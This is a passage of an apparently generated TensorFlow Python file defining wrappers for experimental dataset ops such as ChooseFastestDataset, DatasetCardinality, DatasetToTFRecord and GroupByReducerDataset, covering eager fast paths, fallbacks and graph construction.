      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  if not isinstance(input_datasets, (list, tuple)):
    raise TypeError(
        "Expected list for 'input_datasets' argument to "
        "'experimental_choose_fastest_dataset' Op, not %r." % input_datasets)
  _attr_N = len(input_datasets)  # N attr mirrors the number of input datasets.
  num_experiments = _execute.make_int(num_experiments, "num_experiments")
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_choose_fastest_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_choose_fastest_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  _, _, _op = _op_def_lib._apply_op_helper(
        "ExperimentalChooseFastestDataset", input_datasets=input_datasets,
                                            num_experiments=num_experiments,
                                            output_types=output_types,
                                            output_shapes=output_shapes,
                                            name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = ("N", _op.get_attr("N"), "num_experiments",
            _op.get_attr("num_experiments"), "output_types",
            _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"))
  _execute.record_gradient(
      "ExperimentalChooseFastestDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def ExperimentalChooseFastestDataset(input_datasets, num_experiments, output_types, output_shapes, name=None):
  # Raw-op alias: forward every argument straight to the snake_case wrapper.
  return experimental_choose_fastest_dataset(
      input_datasets, num_experiments, output_types, output_shapes, name=name)
ExperimentalChooseFastestDataset.__doc__ = experimental_choose_fastest_dataset.__doc__
ExperimentalChooseFastestDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalChooseFastestDataset))
tf_export("raw_ops.ExperimentalChooseFastestDataset")(ExperimentalChooseFastestDataset)
def experimental_choose_fastest_dataset_eager_fallback(input_datasets, num_experiments, output_types, output_shapes, name=None, ctx=None):
  r"""This is the slowpath function for Eager mode.
  This is for function experimental_choose_fastest_dataset
  """
  # Use the caller-supplied context when given, else the global eager context.
  _ctx = ctx or _context.context()
  # Validate input_datasets; the N attr is its length.
  if not isinstance(input_datasets, (list, tuple)):
    raise TypeError(
        "Expected list for 'input_datasets' argument to "
        "'experimental_choose_fastest_dataset' Op, not %r." % input_datasets)
  _attr_N = len(input_datasets)
  num_experiments = _execute.make_int(num_experiments, "num_experiments")
  # Validate and canonicalize the attribute lists.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_choose_fastest_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_dt, "output_types")
                  for _dt in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_choose_fastest_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_shape, "output_shapes")
                   for _shape in output_shapes]
  # Coerce every dataset handle to a variant tensor.
  input_datasets = _ops.convert_n_to_tensor(input_datasets, _dtypes.variant)
  _inputs_flat = list(input_datasets)
  _attrs = ("N", _attr_N, "num_experiments", num_experiments, "output_types",
            output_types, "output_shapes", output_shapes)
  # Execute eagerly (one output) and register the op for gradients.
  _result = _execute.execute(b"ExperimentalChooseFastestDataset", 1,
                             inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
                             name=name)
  _execute.record_gradient(
      "ExperimentalChooseFastestDataset", _inputs_flat, _attrs, _result, name)
  (_result,) = _result
  return _result
def experimental_dataset_cardinality(input_dataset, name=None):
  r"""Returns the cardinality of `input_dataset`.
  Returns the cardinality of `input_dataset`.
  Args:
    input_dataset: A `Tensor` of type `variant`.
      A variant tensor representing the dataset to return cardinality for.
    name: A name for the operation (optional).
  Returns:
    A `Tensor` of type `int64`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the C-level fast path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "ExperimentalDatasetCardinality", name,
        _ctx._post_execution_callbacks, input_dataset)
      return _result
    except _core._FallbackException:
      # The fast path rejected these inputs; retry via the slow eager path.
      try:
        return experimental_dataset_cardinality_eager_fallback(
            input_dataset, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Surface the C++ status as a Python exception, appending the op name.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  # This op has no attrs, so graph construction is a single helper call.
  _, _, _op = _op_def_lib._apply_op_helper(
        "ExperimentalDatasetCardinality", input_dataset=input_dataset,
                                          name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = None
  _execute.record_gradient(
      "ExperimentalDatasetCardinality", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def ExperimentalDatasetCardinality(input_dataset, name=None):
  # Raw-op alias: forward every argument straight to the snake_case wrapper.
  return experimental_dataset_cardinality(input_dataset, name=name)
ExperimentalDatasetCardinality.__doc__ = experimental_dataset_cardinality.__doc__
ExperimentalDatasetCardinality = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalDatasetCardinality))
tf_export("raw_ops.ExperimentalDatasetCardinality")(ExperimentalDatasetCardinality)
def experimental_dataset_cardinality_eager_fallback(input_dataset, name=None, ctx=None):
  r"""This is the slowpath function for Eager mode.
  This is for function experimental_dataset_cardinality
  """
  # Use the caller-supplied context when given, else the global eager context.
  _ctx = ctx or _context.context()
  # The single input is a variant-dtype dataset handle; the op has no attrs.
  input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
  _inputs_flat = [input_dataset]
  _attrs = None
  # Execute eagerly (one output) and register the op for gradients.
  _result = _execute.execute(b"ExperimentalDatasetCardinality", 1,
                             inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
                             name=name)
  _execute.record_gradient(
      "ExperimentalDatasetCardinality", _inputs_flat, _attrs, _result, name)
  (_result,) = _result
  return _result
def experimental_dataset_to_tf_record(input_dataset, filename, compression_type, name=None):
  r"""Writes the given dataset to the given file using the TFRecord format.
  Args:
    input_dataset: A `Tensor` of type `variant`.
      A variant tensor representing the dataset to write.
    filename: A `Tensor` of type `string`.
      A scalar string tensor representing the filename to use.
    compression_type: A `Tensor` of type `string`.
      A scalar string tensor containing either (i) the empty string (no
      compression), (ii) "ZLIB", or (iii) "GZIP".
    name: A name for the operation (optional).
  Returns:
    The created Operation.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the C-level fast path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "ExperimentalDatasetToTFRecord", name, _ctx._post_execution_callbacks,
        input_dataset, filename, compression_type)
      return _result
    except _core._FallbackException:
      # The fast path rejected these inputs; retry via the slow eager path.
      try:
        return experimental_dataset_to_tf_record_eager_fallback(
            input_dataset, filename, compression_type, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Surface the C++ status as a Python exception, appending the op name.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  _, _, _op = _op_def_lib._apply_op_helper(
        "ExperimentalDatasetToTFRecord", input_dataset=input_dataset,
                                         filename=filename,
                                         compression_type=compression_type,
                                         name=name)
  # The op has no outputs, so return the created Operation itself.
  # (The generator previously emitted an unreachable `_result = None;
  # return _result` after this return; that dead code has been removed.)
  return _op
def ExperimentalDatasetToTFRecord(input_dataset, filename, compression_type, name=None):
  # Raw-op alias: forward every argument straight to the snake_case wrapper.
  return experimental_dataset_to_tf_record(
      input_dataset, filename, compression_type, name=name)
ExperimentalDatasetToTFRecord.__doc__ = experimental_dataset_to_tf_record.__doc__
ExperimentalDatasetToTFRecord = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalDatasetToTFRecord))
tf_export("raw_ops.ExperimentalDatasetToTFRecord")(ExperimentalDatasetToTFRecord)
def experimental_dataset_to_tf_record_eager_fallback(input_dataset, filename, compression_type, name=None, ctx=None):
  r"""This is the slowpath function for Eager mode.
  This is for function experimental_dataset_to_tf_record
  """
  # Use the caller-supplied context when given, else the global eager context.
  _ctx = ctx or _context.context()
  # Coerce each input to the dtype declared by the op definition.
  input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
  filename = _ops.convert_to_tensor(filename, _dtypes.string)
  compression_type = _ops.convert_to_tensor(compression_type, _dtypes.string)
  _inputs_flat = [input_dataset, filename, compression_type]
  _attrs = None
  # Zero outputs: run for the side effect only and return None.
  _execute.execute(b"ExperimentalDatasetToTFRecord", 0, inputs=_inputs_flat,
                   attrs=_attrs, ctx=_ctx, name=name)
  return None
def experimental_dense_to_sparse_batch_dataset(input_dataset, batch_size, row_shape, output_types, output_shapes, name=None):
  r"""Creates a dataset that batches input elements into a SparseTensor.
  Args:
    input_dataset: A `Tensor` of type `variant`.
      A handle to an input dataset. Must have a single component.
    batch_size: A `Tensor` of type `int64`.
      A scalar representing the number of elements to accumulate in a
      batch.
    row_shape: A `Tensor` of type `int64`.
      A vector representing the dense shape of each row in the produced
      SparseTensor. The shape may be partially specified, using `-1` to indicate
      that a particular dimension should use the maximum size of all batch elements.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
    name: A name for the operation (optional).
  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the C-level fast path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "ExperimentalDenseToSparseBatchDataset", name,
        _ctx._post_execution_callbacks, input_dataset, batch_size, row_shape,
        "output_types", output_types, "output_shapes", output_shapes)
      return _result
    except _core._FallbackException:
      # The fast path rejected these inputs; retry via the slow eager path.
      try:
        return experimental_dense_to_sparse_batch_dataset_eager_fallback(
            input_dataset, batch_size, row_shape, output_types=output_types,
            output_shapes=output_shapes, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Surface the C++ status as a Python exception, appending the op name.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_dense_to_sparse_batch_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_dense_to_sparse_batch_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  _, _, _op = _op_def_lib._apply_op_helper(
        "ExperimentalDenseToSparseBatchDataset", input_dataset=input_dataset,
                                                 batch_size=batch_size,
                                                 row_shape=row_shape,
                                                 output_types=output_types,
                                                 output_shapes=output_shapes,
                                                 name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"))
  _execute.record_gradient(
      "ExperimentalDenseToSparseBatchDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def ExperimentalDenseToSparseBatchDataset(input_dataset, batch_size, row_shape, output_types, output_shapes, name=None):
  # Raw-op alias: forward every argument straight to the snake_case wrapper.
  return experimental_dense_to_sparse_batch_dataset(
      input_dataset, batch_size, row_shape, output_types, output_shapes,
      name=name)
ExperimentalDenseToSparseBatchDataset.__doc__ = experimental_dense_to_sparse_batch_dataset.__doc__
ExperimentalDenseToSparseBatchDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalDenseToSparseBatchDataset))
tf_export("raw_ops.ExperimentalDenseToSparseBatchDataset")(ExperimentalDenseToSparseBatchDataset)
def experimental_dense_to_sparse_batch_dataset_eager_fallback(input_dataset, batch_size, row_shape, output_types, output_shapes, name=None, ctx=None):
  r"""This is the slowpath function for Eager mode.
  This is for function experimental_dense_to_sparse_batch_dataset
  """
  # Use the caller-supplied context when given, else the global eager context.
  _ctx = ctx or _context.context()
  # Validate and canonicalize the attribute lists.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_dense_to_sparse_batch_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_dt, "output_types")
                  for _dt in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_dense_to_sparse_batch_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_shape, "output_shapes")
                   for _shape in output_shapes]
  # Coerce each input to the dtype declared by the op definition.
  input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
  batch_size = _ops.convert_to_tensor(batch_size, _dtypes.int64)
  row_shape = _ops.convert_to_tensor(row_shape, _dtypes.int64)
  _inputs_flat = [input_dataset, batch_size, row_shape]
  _attrs = ("output_types", output_types, "output_shapes", output_shapes)
  # Execute eagerly (one output) and register the op for gradients.
  _result = _execute.execute(b"ExperimentalDenseToSparseBatchDataset", 1,
                             inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
                             name=name)
  _execute.record_gradient(
      "ExperimentalDenseToSparseBatchDataset", _inputs_flat, _attrs, _result, name)
  (_result,) = _result
  return _result
def experimental_directed_interleave_dataset(selector_input_dataset, data_input_datasets, output_types, output_shapes, name=None):
  r"""A substitute for `InterleaveDataset` on a fixed list of `N` datasets.
  Args:
    selector_input_dataset: A `Tensor` of type `variant`.
      A dataset of scalar `DT_INT64` elements that determines which of the
      `N` data inputs should produce the next output element.
    data_input_datasets: A list of at least 1 `Tensor` objects with type `variant`.
      `N` datasets with the same type that will be interleaved according to
      the values of `selector_input_dataset`.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
    name: A name for the operation (optional).
  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the C-level fast path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "ExperimentalDirectedInterleaveDataset", name,
        _ctx._post_execution_callbacks, selector_input_dataset,
        data_input_datasets, "output_types", output_types, "output_shapes",
        output_shapes)
      return _result
    except _core._FallbackException:
      # The fast path rejected these inputs; retry via the slow eager path.
      try:
        return experimental_directed_interleave_dataset_eager_fallback(
            selector_input_dataset, data_input_datasets,
            output_types=output_types, output_shapes=output_shapes, name=name,
            ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Surface the C++ status as a Python exception, appending the op name.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  if not isinstance(data_input_datasets, (list, tuple)):
    raise TypeError(
        "Expected list for 'data_input_datasets' argument to "
        "'experimental_directed_interleave_dataset' Op, not %r." % data_input_datasets)
  _attr_N = len(data_input_datasets)  # N attr mirrors the number of data inputs.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_directed_interleave_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_directed_interleave_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  _, _, _op = _op_def_lib._apply_op_helper(
        "ExperimentalDirectedInterleaveDataset", selector_input_dataset=selector_input_dataset,
                                                 data_input_datasets=data_input_datasets,
                                                 output_types=output_types,
                                                 output_shapes=output_shapes,
                                                 name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"), "N", _op.get_attr("N"))
  _execute.record_gradient(
      "ExperimentalDirectedInterleaveDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def ExperimentalDirectedInterleaveDataset(selector_input_dataset, data_input_datasets, output_types, output_shapes, name=None):
  # Raw-op alias: forward every argument straight to the snake_case wrapper.
  return experimental_directed_interleave_dataset(
      selector_input_dataset, data_input_datasets, output_types,
      output_shapes, name=name)
ExperimentalDirectedInterleaveDataset.__doc__ = experimental_directed_interleave_dataset.__doc__
ExperimentalDirectedInterleaveDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalDirectedInterleaveDataset))
tf_export("raw_ops.ExperimentalDirectedInterleaveDataset")(ExperimentalDirectedInterleaveDataset)
def experimental_directed_interleave_dataset_eager_fallback(selector_input_dataset, data_input_datasets, output_types, output_shapes, name=None, ctx=None):
  r"""This is the slowpath function for Eager mode.
  This is for function experimental_directed_interleave_dataset
  """
  # Use the caller-supplied context when given, else the global eager context.
  _ctx = ctx or _context.context()
  # Validate data_input_datasets; the N attr is its length.
  if not isinstance(data_input_datasets, (list, tuple)):
    raise TypeError(
        "Expected list for 'data_input_datasets' argument to "
        "'experimental_directed_interleave_dataset' Op, not %r." % data_input_datasets)
  _attr_N = len(data_input_datasets)
  # Validate and canonicalize the attribute lists.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_directed_interleave_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_dt, "output_types")
                  for _dt in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_directed_interleave_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_shape, "output_shapes")
                   for _shape in output_shapes]
  # Coerce the selector and every data dataset handle to variant tensors.
  selector_input_dataset = _ops.convert_to_tensor(selector_input_dataset, _dtypes.variant)
  data_input_datasets = _ops.convert_n_to_tensor(data_input_datasets, _dtypes.variant)
  _inputs_flat = [selector_input_dataset] + list(data_input_datasets)
  _attrs = ("output_types", output_types, "output_shapes", output_shapes, "N",
            _attr_N)
  # Execute eagerly (one output) and register the op for gradients.
  _result = _execute.execute(b"ExperimentalDirectedInterleaveDataset", 1,
                             inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
                             name=name)
  _execute.record_gradient(
      "ExperimentalDirectedInterleaveDataset", _inputs_flat, _attrs, _result, name)
  (_result,) = _result
  return _result
def experimental_group_by_reducer_dataset(input_dataset, key_func_other_arguments, init_func_other_arguments, reduce_func_other_arguments, finalize_func_other_arguments, key_func, init_func, reduce_func, finalize_func, output_types, output_shapes, name=None):
  r"""Creates a dataset that computes a group-by on `input_dataset`.

  Creates a dataset that computes a group-by on `input_dataset`.

  Args:
    input_dataset: A `Tensor` of type `variant`.
      A variant tensor representing the input dataset.
    key_func_other_arguments: A list of `Tensor` objects.
      A list of tensors, typically values that were captured when
      building a closure for `key_func`.
    init_func_other_arguments: A list of `Tensor` objects.
      A list of tensors, typically values that were captured when
      building a closure for `init_func`.
    reduce_func_other_arguments: A list of `Tensor` objects.
      A list of tensors, typically values that were captured when
      building a closure for `reduce_func`.
    finalize_func_other_arguments: A list of `Tensor` objects.
      A list of tensors, typically values that were captured when
      building a closure for `finalize_func`.
    key_func: A function decorated with @Defun.
      A function mapping an element of `input_dataset`, concatenated
      with `key_func_other_arguments` to a scalar value of type DT_INT64.
    init_func: A function decorated with @Defun.
      A function mapping a key of type DT_INT64, concatenated with
      `init_func_other_arguments` to the initial reducer state.
    reduce_func: A function decorated with @Defun.
      A function mapping the current reducer state and an element of `input_dataset`,
      concatenated with `reduce_func_other_arguments` to a new reducer state.
    finalize_func: A function decorated with @Defun.
      A function mapping the final reducer state to an output element.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the C fast path first; it bypasses the Python
    # op-building machinery entirely.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "ExperimentalGroupByReducerDataset", name,
        _ctx._post_execution_callbacks, input_dataset,
        key_func_other_arguments, init_func_other_arguments,
        reduce_func_other_arguments, finalize_func_other_arguments,
        "key_func", key_func, "init_func", init_func, "reduce_func",
        reduce_func, "finalize_func", finalize_func, "output_types",
        output_types, "output_shapes", output_shapes)
      return _result
    except _core._FallbackException:
      # The fast path rejected these inputs; retry via the slower
      # Python eager fallback.
      try:
        return experimental_group_by_reducer_dataset_eager_fallback(
            input_dataset, key_func_other_arguments,
            init_func_other_arguments, reduce_func_other_arguments,
            finalize_func_other_arguments, key_func=key_func,
            init_func=init_func, reduce_func=reduce_func,
            finalize_func=finalize_func, output_types=output_types,
            output_shapes=output_shapes, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Convert the op status into the matching Python exception,
      # attaching the op name for context.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  # Validate and canonicalize list-valued attributes before building the op.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_group_by_reducer_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_group_by_reducer_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  _, _, _op = _op_def_lib._apply_op_helper(
        "ExperimentalGroupByReducerDataset", input_dataset=input_dataset,
        key_func_other_arguments=key_func_other_arguments,
        init_func_other_arguments=init_func_other_arguments,
        reduce_func_other_arguments=reduce_func_other_arguments,
        finalize_func_other_arguments=finalize_func_other_arguments,
        key_func=key_func,
        init_func=init_func,
        reduce_func=reduce_func,
        finalize_func=finalize_func,
        output_types=output_types,
        output_shapes=output_shapes,
        name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  # Re-read the attrs from the created op for gradient recording.
  _attrs = ("key_func", _op.get_attr("key_func"), "init_func",
            _op.get_attr("init_func"), "reduce_func",
            _op.get_attr("reduce_func"), "finalize_func",
            _op.get_attr("finalize_func"), "Tkey_func_other_arguments",
            _op.get_attr("Tkey_func_other_arguments"),
            "Tinit_func_other_arguments",
            _op.get_attr("Tinit_func_other_arguments"),
            "Treduce_func_other_arguments",
            _op.get_attr("Treduce_func_other_arguments"),
            "Tfinalize_func_other_arguments",
            _op.get_attr("Tfinalize_func_other_arguments"), "output_types",
            _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"))
  _execute.record_gradient(
      "ExperimentalGroupByReducerDataset", _inputs_flat, _attrs, _result, name)
  # Single-output op: unwrap the one-element list.
  _result, = _result
  return _result
def ExperimentalGroupByReducerDataset(input_dataset, key_func_other_arguments, init_func_other_arguments, reduce_func_other_arguments, finalize_func_other_arguments, key_func, init_func, reduce_func, finalize_func, output_types, output_shapes, name=None):
  # Raw-op alias: forward every argument to the snake_case implementation.
  return experimental_group_by_reducer_dataset(
      input_dataset, key_func_other_arguments, init_func_other_arguments,
      reduce_func_other_arguments, finalize_func_other_arguments, key_func,
      init_func, reduce_func, finalize_func, output_types, output_shapes,
      name=name)
# Raw-op registration: reuse the snake_case docstring, hide the alias from
# generated docs, make it keyword-only, and export it under tf.raw_ops.
ExperimentalGroupByReducerDataset.__doc__ = experimental_group_by_reducer_dataset.__doc__
ExperimentalGroupByReducerDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalGroupByReducerDataset))
tf_export("raw_ops.ExperimentalGroupByReducerDataset")(ExperimentalGroupByReducerDataset)
def experimental_group_by_reducer_dataset_eager_fallback(input_dataset, key_func_other_arguments, init_func_other_arguments, reduce_func_other_arguments, finalize_func_other_arguments, key_func, init_func, reduce_func, finalize_func, output_types, output_shapes, name=None, ctx=None):
  r"""Eager-mode slow path for experimental_group_by_reducer_dataset.

  Canonicalizes attributes, converts the inputs to eager tensors and runs
  the ExperimentalGroupByReducerDataset op through _execute.execute.
  """
  eager_ctx = ctx or _context.context()
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_group_by_reducer_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(t, "output_types") for t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_group_by_reducer_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(s, "output_shapes") for s in output_shapes]
  # Each captured-argument list may mix dtypes; record the dtype list as an
  # attr alongside the converted tensors.
  _attr_Tkey_func_other_arguments, key_func_other_arguments = _execute.convert_to_mixed_eager_tensors(key_func_other_arguments, eager_ctx)
  _attr_Tinit_func_other_arguments, init_func_other_arguments = _execute.convert_to_mixed_eager_tensors(init_func_other_arguments, eager_ctx)
  _attr_Treduce_func_other_arguments, reduce_func_other_arguments = _execute.convert_to_mixed_eager_tensors(reduce_func_other_arguments, eager_ctx)
  _attr_Tfinalize_func_other_arguments, finalize_func_other_arguments = _execute.convert_to_mixed_eager_tensors(finalize_func_other_arguments, eager_ctx)
  input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
  flat_inputs = [input_dataset]
  flat_inputs.extend(key_func_other_arguments)
  flat_inputs.extend(init_func_other_arguments)
  flat_inputs.extend(reduce_func_other_arguments)
  flat_inputs.extend(finalize_func_other_arguments)
  op_attrs = ("key_func", key_func, "init_func", init_func,
              "reduce_func", reduce_func, "finalize_func", finalize_func,
              "Tkey_func_other_arguments", _attr_Tkey_func_other_arguments,
              "Tinit_func_other_arguments", _attr_Tinit_func_other_arguments,
              "Treduce_func_other_arguments", _attr_Treduce_func_other_arguments,
              "Tfinalize_func_other_arguments",
              _attr_Tfinalize_func_other_arguments,
              "output_types", output_types, "output_shapes", output_shapes)
  results = _execute.execute(b"ExperimentalGroupByReducerDataset", 1,
                             inputs=flat_inputs, attrs=op_attrs,
                             ctx=eager_ctx, name=name)
  _execute.record_gradient(
      "ExperimentalGroupByReducerDataset", flat_inputs, op_attrs, results,
      name)
  # Single-output op: unwrap the one-element result list.
  return results[0]
def experimental_group_by_window_dataset(input_dataset, key_func_other_arguments, reduce_func_other_arguments, window_size_func_other_arguments, key_func, reduce_func, window_size_func, output_types, output_shapes, name=None):
  r"""Creates a dataset that computes a windowed group-by on `input_dataset`.

  // TODO(mrry): Support non-int64 keys.

  Args:
    input_dataset: A `Tensor` of type `variant`.
    key_func_other_arguments: A list of `Tensor` objects.
    reduce_func_other_arguments: A list of `Tensor` objects.
    window_size_func_other_arguments: A list of `Tensor` objects.
    key_func: A function decorated with @Defun.
      A function mapping an element of `input_dataset`, concatenated
      with `key_func_other_arguments` to a scalar value of type DT_INT64.
    reduce_func: A function decorated with @Defun.
    window_size_func: A function decorated with @Defun.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the C fast path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "ExperimentalGroupByWindowDataset", name,
        _ctx._post_execution_callbacks, input_dataset,
        key_func_other_arguments, reduce_func_other_arguments,
        window_size_func_other_arguments, "key_func", key_func, "reduce_func",
        reduce_func, "window_size_func", window_size_func, "output_types",
        output_types, "output_shapes", output_shapes)
      return _result
    except _core._FallbackException:
      # The fast path rejected these inputs; retry via the slower
      # Python eager fallback.
      try:
        return experimental_group_by_window_dataset_eager_fallback(
            input_dataset, key_func_other_arguments,
            reduce_func_other_arguments, window_size_func_other_arguments,
            key_func=key_func, reduce_func=reduce_func,
            window_size_func=window_size_func, output_types=output_types,
            output_shapes=output_shapes, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Convert the op status into the matching Python exception.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  # Validate and canonicalize list-valued attributes before building the op.
  if not isinstance(output_types, (list, tuple)):
